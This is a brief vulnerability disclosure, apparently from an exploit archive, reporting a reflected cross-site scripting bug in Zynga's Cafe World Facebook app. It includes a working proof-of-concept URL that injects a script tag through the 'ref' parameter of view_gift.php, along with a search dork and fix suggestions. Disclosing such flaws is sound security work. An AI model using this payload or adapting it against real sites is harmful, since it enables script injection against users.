Zynga Cafeworld suffers from a cross site scripting vulnerability.
1de5054521841a8b4b7f9e1ce5d0edc67d02933eb806e248c8fa2d44e4d20cf4
_______ ________________ __ _____________
_______ \ _ \ \ _ \______ \ | _/_ \______ \ __ _ __
\_ __ \/ /_\ \/ /_\ \ / / |/ /| | / / ______ \ \/ \/ /
| | \/\ \_/ \ \_/ \/ /| < | | / / /_____/ \ /
|__| \_____ /\_____ /____/ |__|_ \|___| /____/ \/\_/
\/ \/ \/
-------------------------------------------------------------------------------------------------------------------------------------------------
TITLE: Type-0 XSS bug in CAFEWORLD(facebook apps)
vendor: www.apps.facebook.com/cafeworld/**[]
Author: r007k17-w a.k.a Raghavendra Karthik.D
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: Copyright 2010 Zynga Game Network Inc
-----------------------------------------------------------------------------------------------------------------------------------------------------------------
DEMO: http://apps.facebook.com/cafeworld/view_gift.php?ref="><script>alert("r007k17-w")</script>
SUG: HTML encoding, escaping special characters,Input sanitization.
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs to s1d3-3ff3cts and all my friends